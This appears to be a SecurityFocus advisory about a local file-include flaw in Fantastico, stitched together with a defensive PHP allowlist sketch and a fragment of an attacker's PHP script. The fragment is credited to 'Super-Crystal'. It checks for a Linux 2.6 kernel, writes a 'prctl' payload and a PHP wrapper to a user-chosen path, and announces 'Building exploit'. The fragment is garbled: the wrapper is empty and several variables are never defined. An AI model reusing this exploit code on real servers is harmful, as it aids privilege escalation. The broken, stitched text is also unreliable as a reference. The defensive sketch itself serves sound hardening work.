source: https://www.securityfocus.com/bid/32578/info
Fantastico is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
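A defensive sketch of the input handling whose absence the advisory describes, as an added example that is not Fantastico's code and not part of the original advisory: the request selects a name from an allowlist, and the resolved path must stay inside one directory. The function name `resolve_include`, the directory layout and the page names are hypothetical, and the demo assumes a POSIX system where `symlink()` is available.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied page name to a file that is safe to include.
 * Hypothetical helper for illustration; not taken from Fantastico.
 */
function resolve_include(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist: the request picks a known name, it never supplies a path.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Containment: canonicalise (resolves "..", symlinks) and re-check the prefix.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the include directory
    }
    return is_file($real) ? $real : null;
}

// Constructed demo tree: one legitimate page, one file outside the include
// directory, and an allowlisted name that is a symlink pointing outside it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home.php', "<?php return 'home';");
file_put_contents($root . '/secret.php', "<?php return 'secret';");
symlink($root . '/secret.php', $root . '/pages/help.php');

$allowed = ['home', 'help'];
// Constructed inputs: a valid name, traversal, symlink escape, NUL byte, absolute path.
foreach (['home', '../secret', 'help', "home\0.txt", '/etc/passwd'] as $in) {
    $path = resolve_include($in, $root . '/pages', $allowed);
    printf("%-14s => %s\n", addcslashes($in, "\0"),
        $path === null ? 'rejected' : 'include ' . basename($path));
}

// Remove the demo tree.
array_map('unlink', [$root . '/pages/help.php', $root . '/pages/home.php', $root . '/secret.php']);
rmdir($root . '/pages');
rmdir($root);
```

Only `home` resolves to a file. The `help` case shows why the allowlist alone is not enough when the include directory can contain symlinks.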
set_time_limit(0);
if (isset($_POST['sup3r'])) {
    if (stristr(php_uname(), "2.6.") && stristr(php_uname(), "Linux")) {
        $phpwrapper = '
';
        fwrite($h, $prctl);
        fclose($h);
        $handle = fopen($_POST['php'], "w");
        fwrite($handle, $phpwrapper);
        fclose($handle);
        echo "Building exploit...\n";
        echo "coding by Super-Crystal\n";
        echo "Cleaning up\n";
        echo "Done!\n";
    } else {
        echo "error : " . php_uname();
    }
} else {
?>